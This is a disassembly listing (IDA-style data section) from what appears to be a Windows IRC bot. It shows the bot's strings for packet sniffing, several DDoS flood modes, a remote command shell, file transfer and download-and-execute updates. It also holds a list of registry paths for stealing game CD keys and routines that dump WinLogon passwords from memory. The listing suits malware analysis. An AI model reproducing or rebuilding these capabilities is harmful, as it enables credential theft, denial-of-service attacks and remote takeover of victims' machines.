aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_4355B4 db 2Dh ; - ; DATA XREF: sub_41549E+2EB�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
unk_4355E8 db 2Dh ; - ; DATA XREF: sub_41549E+2C1�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_43561C db 2Dh ; - ; DATA XREF: sub_41549E+294�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
; char asc_435650[]
asc_435650 db '-' ; DATA XREF: sub_41549E+10B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 10h
; char asc_435680[]
asc_435680 db '-' ; DATA XREF: sub_41549E+C7�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
; char asc_4356AC[]
asc_4356AC db '-' ; DATA XREF: sub_415825+31F�o
db 3, 34h, 2
dd 736F6464h, 202D0302h, 646E6573h, 72726520h, 203A726Fh
dd 6425h
; char asc_4356C8[]
asc_4356C8 db '-' ; DATA XREF: sub_415BD8+5B�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
; char asc_4356F0[]
asc_4356F0 db '-' ; DATA XREF: sub_415C89+2DB�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 4
; char asc_435738[]
asc_435738 db '-' ; DATA XREF: sub_415C89+274�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
; char asc_435784[]
asc_435784 db '-' ; DATA XREF: sub_415C89+B8�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
; char asc_4357A4[]
asc_4357A4 db '-' ; DATA XREF: sub_415C89+90�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
; char asc_4357D4[]
asc_4357D4 db '-' ; DATA XREF: sub_415C89+4B�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 10h
; char asc_435800[]
asc_435800 db '-' ; DATA XREF: sub_415F82+131�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
; char asc_43582C[]
asc_43582C db '-' ; DATA XREF: sub_415F82+67�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
; char asc_435854[]
asc_435854 db '-' ; DATA XREF: sub_416104+1BC�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 10h
; char asc_435880[]
asc_435880 db '-' ; DATA XREF: sub_416104+87�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
; char asc_4358A8[]
asc_4358A8 db '-' ; DATA XREF: sub_41640E+48�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
; char asc_4358D4[]
asc_4358D4 db '-' ; DATA XREF: sub_4164A9+29D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
; char asc_4358F4[]
asc_4358F4 db '-' ; DATA XREF: sub_4167D6+48�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
; char asc_43591C[]
asc_43591C db '-' ; DATA XREF: sub_416A7E+4D�o
db 3, 34h, 2
dd 67726174h, 3023361h
aDoneWithFlood_ db '- Done with flood.',0
align 10h
; char asc_435940[]
asc_435940 db '-' ; DATA XREF: sub_416B1E+3D5�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 10h
; char asc_435990[]
asc_435990 db '-' ; DATA XREF: sub_416B1E+36B�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 10h
; char asc_4359E0[]
asc_4359E0 db '-' ; DATA XREF: sub_416B1E+C6�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 10h
unk_435A00 db 2Dh ; - ; DATA XREF: sub_416B1E+A7�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
; char asc_435A38[]
asc_435A38 db '-' ; DATA XREF: sub_416B1E+66�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketF_1 db '- Error: socket() failed, returned: <%d>.',0
align 4
; char asc_435A6C[]
asc_435A6C db '-' ; DATA XREF: sub_4171BC+60�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 10h
; char asc_435AA0[]
asc_435AA0 db '-' ; DATA XREF: sub_417272+371�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
align 10h
; char asc_435B30[]
asc_435B30 db '-' ; DATA XREF: sub_417272+31F�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
; char asc_435B94[]
asc_435B94 db '-' ; DATA XREF: sub_417272+F5�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
; char asc_435BC0[]
asc_435BC0 db '-' ; DATA XREF: sub_417272+7C�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
align 8
unk_435C08 db 2Dh ; - ; DATA XREF: sub_417272+5F�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 4
; char asc_435C58[]
asc_435C58 db '-' ; DATA XREF: sub_417272+29�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
; char asc_435C84[]
asc_435C84 db '-' ; DATA XREF: sub_4175F3+47�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
; char aSD[]
aSD db '%s%d ',0 ; DATA XREF: sub_41776E+1EA�o
align 4
; char asc_435CCC[]
asc_435CCC db '-' ; DATA XREF: sub_417BC8+5D�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 4
; char aD_[]
aD_ db '%d. ' ; DATA XREF: sub_417CF8+35�o
dd 73253403h, 203D2003h, 73253703h, 3
dword_435D0C dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_417CF8+10�o
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_417D70+60�o
align 4
dword_435D44 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_417E10:loc_417E45�o
dword_435D58 dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_417E10+20�o
; char asc_435D6C[]
asc_435D6C db '-' ; DATA XREF: sub_417E51+D2�o
db 3, 34h, 2
dd 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h, 6574656Ch
dd 0
dword_435D88 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_417E51+41�o
dd 676E6974h, 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_417F75+12�o
aWindow db 'Window',0 ; DATA XREF: sub_4181B2+23�o
; sub_4183AB+26�o
align 4
aKey3 db 'Key3=',0
align 4
aNeverwinterNig db 'Neverwinter Nights (Hordes of the Underdark)',0
align 4
aKey2 db 'Key2=',0
align 4
aNeverwinterN_0 db 'Neverwinter Nights (Shadows of Undrentide)',0
align 10h
aKey1 db 'Key1=',0
align 4
aNwncdkey_ini db 'nwncdkey.ini',0
align 4
aNeverwinterN_1 db 'Neverwinter Nights',0
align 4
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 10h
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
aSoftwareActivi db 'Software\Activision\Soldier of Fortune II - Double Helix',0
align 10h
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aSoftwareIllusi db 'Software\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
aSoftwareTechla db 'Software\Techland\Chrome',0
align 10h
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 10h
aSoftwareWest_0 db 'Software\Westwood\Red Alert 2',0
align 10h
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 10h
aSoftwareWest_1 db 'Software\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 10h
aSerial db 'Serial',0
align 4
aSoftwareWest_2 db 'Software\Westwood\Tiberian Sun',0
align 4
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
aSoftwareRedSto db 'Software\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 4
aSoftwareElectr db 'Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 4
aSoftwareElec_0 db 'Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 10h
aSoftwareElec_1 db 'Software\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 10h
aSoftwareElec_2 db 'Software\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 10h
aSoftwareElec_3 db 'Software\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 10h
aSoftwareElec_4 db 'Software\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 4
aSoftwareElec_5 db 'Software\Electronic Arts\EA GAMES\Shogun Total War - Warlord Edit'
db 'ion\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
aSoftwareElec_6 db 'Software\Electronic Arts\EA GAMES\Need For Speed Underground\ergc'
db 0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
aSoftwareElec_7 db 'Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 4
aSoftwareElec_8 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault S'
db 'pearhead\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 4
aSoftwareElec_9 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault B'
db 'reakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 10h
aSoftwareEle_10 db 'Software\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\e'
db 'rgc',0
align 4
aGlobalOperatio db 'Global Operations',0
align 4
aSoftwareEle_11 db 'Software\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 4
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 4
aSoftwareEle_12 db 'Software\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 8
aSoftwareEle_13 db 'Software\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 8
aSoftwareEle_14 db 'Software\Electronic Arts\EA GAMES\Command and Conquer Generals Ze'
db 'ro Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
aSoftwareEle_15 db 'Software\Electronic Arts\EA GAMES\Black and White\ergc',0
align 10h
aBattlefieldVie db 'Battlefield Vietnam',0
aSoftwareEle_16 db 'Software\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 10h
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 10h
aSoftwareEle_17 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons'
db ' of WWII\ergc',0
align 10h
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
aSoftwareEle_18 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Ro'
db 'me\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 10h
aSoftwareEle_19 db 'Software\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 4
aSoftwareEle_20 db 'Software\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
aSoftwareIgi2Re db 'Software\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2004',0
align 10h
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 4
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 4
aCustomernumber db 'CustomerNumber',0
align 4
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 10h
aPrvkey db 'prvkey',0
align 4
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 10h
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 10h
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 4
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: .data:00442AA4�o
aCdkey db 'CDKey',0 ; DATA XREF: .data:00442AA0�o
align 4
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: .data:off_442A9C�o
align 10h
; char asc_436B90[]
asc_436B90 db '=',0 ; DATA XREF: sub_4185EA+E7�o
; sub_4185EA+F2�o
align 4
; char asc_436B94[]
asc_436B94 db '-' ; DATA XREF: sub_4185EA+2B�o
db 3, 34h, 2
dd 656B6463h, 3027379h, 7325202Dh, 7325203Ah, 0
; char asc_436BAC[]
asc_436BAC db '-' ; DATA XREF: sub_418799+16A�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 10h
; char asc_436BE0[]
asc_436BE0 db '-' ; DATA XREF: sub_418799+AC�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 10h
; char asc_436C10[]
asc_436C10 db '-' ; DATA XREF: sub_418799+4C�o
; sub_418956+FF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 4
; char asc_436C34[]
asc_436C34 db '-' ; DATA XREF: sub_418956+35E�o
; sub_418CEA+152�o
db 3, 34h, 2
dd 2636364h, 73202D03h, 656B636Fh, 72652074h, 726F72h
; char asc_436C4C[]
asc_436C4C db '-' ; DATA XREF: sub_418956+2F6�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
; char asc_436C78[]
asc_436C78 db '-' ; DATA XREF: sub_418956+1FE�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_436C9C dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_418956+1C7�o
dd 74756Fh
; char dword_436CB4
dword_436CB4 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_418956+16C�o
dd 169h
unk_436CCC db 2Dh ; - ; DATA XREF: sub_418956+129�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
unk_436CEC db 2Dh ; - ; DATA XREF: sub_418956+84�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_436D10 db 2Dh ; - ; DATA XREF: sub_418956+46�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_2 db '- failed to create socket',0
align 4
; char asc_436D34[]
asc_436D34 db '-' ; DATA XREF: sub_418CEA+1C7�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 10h
; char asc_436D60[]
asc_436D60 db '-' ; DATA XREF: sub_418CEA+C7�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
unk_436D80 db 2Dh ; - ; DATA XREF: sub_418CEA+A7�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
; char aAB[]
aAB db 'a+b',0 ; DATA XREF: sub_418CEA+93�o
unk_436DB0 db 2Dh ; - ; DATA XREF: sub_418CEA+7F�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 10h
; char asc_436DE0[]
asc_436DE0 db '-' ; DATA XREF: sub_418F38+491�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
unk_436E0C db 2Dh ; - ; DATA XREF: sub_418F38+483�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 10h
; char asc_436E40[]
asc_436E40 db '-' ; DATA XREF: sub_418F38+3D9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 4
; char asc_436E84[]
asc_436E84 db '-' ; DATA XREF: sub_418F38+35A�o
db 3, 34h, 2
dd 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh, 25206465h
dd 73h
; char asc_436EA0[]
asc_436EA0 db '-' ; DATA XREF: sub_418F38+2E3�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
dbl_436ED8 dq 9.765625e-4 ; DATA XREF: sub_418F38+2B2�r
; sub_418F38:loc_41920A�r ...
; char asc_436EE0[]
asc_436EE0 db '-' ; DATA XREF: sub_418F38+256�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
; char asc_436F08[]
asc_436F08 db '-' ; DATA XREF: sub_418F38+1C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
; char asc_436F34[]
asc_436F34 db '-' ; DATA XREF: sub_418F38:loc_4190CF�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 4
unk_436F5C db 2Dh ; - ; DATA XREF: sub_418F38+190�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
; char asc_436F84[]
asc_436F84 db '-' ; DATA XREF: sub_418F38+79�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 4
aUnknown db 'Unknown',0 ; DATA XREF: sub_4194B8:loc_4194FB�o
; sub_41B98C+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_4194B8:loc_4194F5�o
aDisk db 'Disk',0 ; DATA XREF: sub_4194B8:loc_4194EF�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4194B8:loc_4194E9�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4194B8:loc_4194E3�o
align 4
off_436FD4 dd offset word_4D4152 ; DATA XREF: sub_4194B8:loc_4194DD�o
dword_436FD8 dd 3Fh ; DATA XREF: sub_4194B8+1F�o
; char aFailed[]
aFailed db 'failed',0 ; DATA XREF: sub_419549:loc_419621�o
; sub_419664+24�o
align 4
; char aSkb[]
aSkb db '%sKB',0 ; DATA XREF: sub_419549+6C�o
align 4
; char asc_436FEC[]
asc_436FEC db '-' ; DATA XREF: sub_419664+7D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
; char asc_437028[]
asc_437028 db '-' ; DATA XREF: sub_419664+47�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
; char aA_1[]
aA_1 db 'A:\',0 ; DATA XREF: sub_419725:loc_41975B�o
; char asc_437068[]
asc_437068 db '-' ; DATA XREF: sub_419799+107�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 73252064h
dd 73255Ch
; char aS_4[]
aS_4 db '%s\*',0 ; DATA XREF: sub_419799+14�o
align 4
; char asc_43708C[]
asc_43708C db '-' ; DATA XREF: sub_4198EB+C7�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 64252064h
dd 6C696620h, 7365h
; char asc_4370AC[]
asc_4370AC db '-' ; DATA XREF: sub_4198EB+5E�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
; char aMsgina[]
aMsgina db 'MSGINA',0 ; DATA XREF: sub_419A03+13E�o
align 4
; char aNwgina[]
aNwgina db 'NWGINA',0 ; DATA XREF: sub_419A03+123�o
align 4
; char aWinlogon[]
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_419A03+B9�o
align 10h
; char asc_4370F0[]
asc_4370F0 db '-' ; DATA XREF: sub_419E4F+70�o
; sub_419EE6+C5�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_437140[]
asc_437140 db '-' ; DATA XREF: sub_419EE6+DF�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 412F4E28h, 2929h
; char asc_437194[]
asc_437194 db '-' ; DATA XREF: sub_419FFD:loc_41A174�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
; char asc_4371C8[]
asc_4371C8 db '-' ; DATA XREF: sub_419FFD:loc_41A148�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
unk_4371F4 db 2Dh ; - ; DATA XREF: sub_419FFD:loc_41A141�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 10h
; char asc_437230[]
asc_437230 db '-' ; DATA XREF: sub_419FFD+116�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
aUserdomain: ; DATA XREF: sub_419FFD+DB�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_419FFD+CD�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_419FFD+99�o
align 4
